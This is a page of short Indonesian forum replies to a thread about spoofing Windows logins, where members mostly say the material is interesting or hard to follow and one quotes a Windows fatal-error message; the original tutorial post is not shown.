Member Aktif
Member Aktif
avatar

Jumlah posting : 157
Join date : 12.05.10
Lokasi : di depan monitor

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sat Jul 10, 2010 7:43 pm

mantab ouy. . . . . , berasa dapet kuliahan. walau tidak sepenuhnya paham, lumayan lah tambah-tambah pengetahuan tentang sistem dan hack pada windows,
Lanjut kuliah on line nya mod [You must be registered and logged in to see this image.] .
Spoiler:
 
Kembali Ke Atas Go down
curet
Member Aktif
Member Aktif
avatar

Jumlah posting : 234
Join date : 13.05.10
Lokasi : desa tertinggal

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sat Jul 10, 2010 9:38 pm





ikutan nyimak mod
Kembali Ke Atas Go down
gonggo
Verified Phreaker
Verified Phreaker
avatar

Jumlah posting : 369
Join date : 17.05.10
Age : 28
Lokasi : manado

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sun Jul 11, 2010 9:21 am

STOP: c000021a {Fatal System Error}
The Windows Logon Process system process terminated unexpectedly with a status of 0xc0000034 (0x00000000 0x0000000)
The system has been shutdown.
Kembali Ke Atas Go down
DonKus
Member Aktif
Member Aktif
avatar

Jumlah posting : 268
Join date : 29.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sun Jul 11, 2010 12:34 pm

ga ngerti gan
Kembali Ke Atas Go down
deluna
Member Aktif
Member Aktif
avatar

Jumlah posting : 137
Join date : 10.06.10
Age : 30

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Thu Jul 15, 2010 9:16 pm

hmm...
harus baca atu persatu baris per baris dulu neh...
baru bisa tanya kenapa?
Kembali Ke Atas Go down
derainbow
Senior Member
Senior Member
avatar

Jumlah posting : 434
Join date : 12.07.10
Age : 26
Lokasi : Tanah Daeng

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Thu Jul 15, 2010 9:23 pm

wah puyeng juga bacanya mastah. . .

mana ga ngerti yang di bahas apaan. [You must be registered and logged in to see this image.]
Kembali Ke Atas Go down
joeynubie
Verified Member
Verified Member
avatar

Jumlah posting : 394
Join date : 25.06.10
Age : 31
Lokasi : Beetwen White & Black

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 09, 2010 1:50 pm

hmmm menarik bgt...tambah ilmu lg...
Kembali Ke Atas Go down
katrok people
Member
Member
avatar

Jumlah posting : 69
Join date : 11.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 09, 2010 2:01 pm

Puyeng juga baca nya Jeng Mind :775:
Kembali Ke Atas Go down
Tamu
Tamu



PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 09, 2010 4:00 pm

kalo gak salah ni cuman buat xp doang yah teh, sudah ada buat 7 blm teh?

Kembali Ke Atas Go down
kakimeja
Member Aktif
Member Aktif
avatar

Jumlah posting : 215
Join date : 09.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sat Aug 14, 2010 10:19 pm

[You must be registered and logged in to see this image.] ane masih blom mudeng nih min... musti dipelajari lgi lebih mendalam nih... [You must be registered and logged in to see this image.]
Kembali Ke Atas Go down
nogeto0o
Member Baru
Member Baru
avatar

Jumlah posting : 30
Join date : 12.07.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sun Aug 15, 2010 12:55 am

ane blom mudeng nih min...
baca2 lg dah [You must be registered and logged in to see this image.]
Kembali Ke Atas Go down
ipin821
Member
Member
avatar

Jumlah posting : 79
Join date : 20.07.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sun Aug 15, 2010 2:50 am

sama bro belum mudeng maklum bukan ahlinya. [You must be registered and logged in to see this image.] ijin nyimak ya sis.
Kembali Ke Atas Go down
chezzter
Member
Member


Jumlah posting : 54
Join date : 12.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sun Aug 15, 2010 12:25 pm

[You must be registered and logged in to see this image.] masih rada binunn~~
Kembali Ke Atas Go down
shiropetto
Member Aktif
Member Aktif
avatar

Jumlah posting : 248
Join date : 08.07.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 16, 2010 3:02 am

ilmu ane belum sampai min...
Kembali Ke Atas Go down
hrenlm
DONATUR JC
DONATUR JC


Jumlah posting : 27
Join date : 09.07.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 16, 2010 8:39 pm

nyimak dulu sambil belajar gan
Kembali Ke Atas Go down
nink21
Member Baru
Member Baru


Jumlah posting : 27
Join date : 17.07.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Fri Aug 20, 2010 5:06 pm

:m2: biar lebih lengkap kasih sample kali yee?
Kembali Ke Atas Go down
zsetta
Member Baru
Member Baru


Jumlah posting : 30
Join date : 10.06.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Sat Aug 21, 2010 3:46 pm

Mencoba memahami kata demi kata:hdt:
Kali aja bisa pinter kayak om/sis Mindhack :hdk:
Kembali Ke Atas Go down
virgintaker
Member Baru
Member Baru


Jumlah posting : 25
Join date : 04.06.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Mon Aug 23, 2010 2:40 am

hmm.. aduh, otak gw loadingnya ga kelar2
Kembali Ke Atas Go down
primus
Member Aktif
Member Aktif
avatar

Jumlah posting : 151
Join date : 24.08.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Thu Aug 26, 2010 3:09 pm

info penting buat yg ingin belajar jd hacker [You must be registered and logged in to see this image.]
Kembali Ke Atas Go down
ahaaayy
Member Baru
Member Baru


Jumlah posting : 46
Join date : 10.05.10

PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   Thu Aug 26, 2010 5:33 pm

Duh,ga ngerti

ijin copas dlu deh,ntar di baca2 lagi.. :D
Kembali Ke Atas Go down
Sponsored content




PostSubyek: Re: SPOOFING LOGIN ACCOUNT WINDOWS   

Kembali Ke Atas Go down
 
SPOOFING LOGIN ACCOUNT WINDOWS
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 2Pilih halaman : 1, 2  Next
 Similar topics
-
» Cara mengaktifkan Guest Account di Windows 8 (dengan Gambar)
» Javascript: Login Melayang [All version]
» Javascript: Mengalihkan member setelah login [All version]
» Tukeran No HP yuk...
» Update Status Facebook via Blueberry, Telepon Umum, Wartel, Kantor Pos, HP Pinjaman, Warnet, Hati

Permissions in this forum:Anda tidak dapat menjawab topik
 :: GENERAL LOUNGE :: Education-
Navigasi: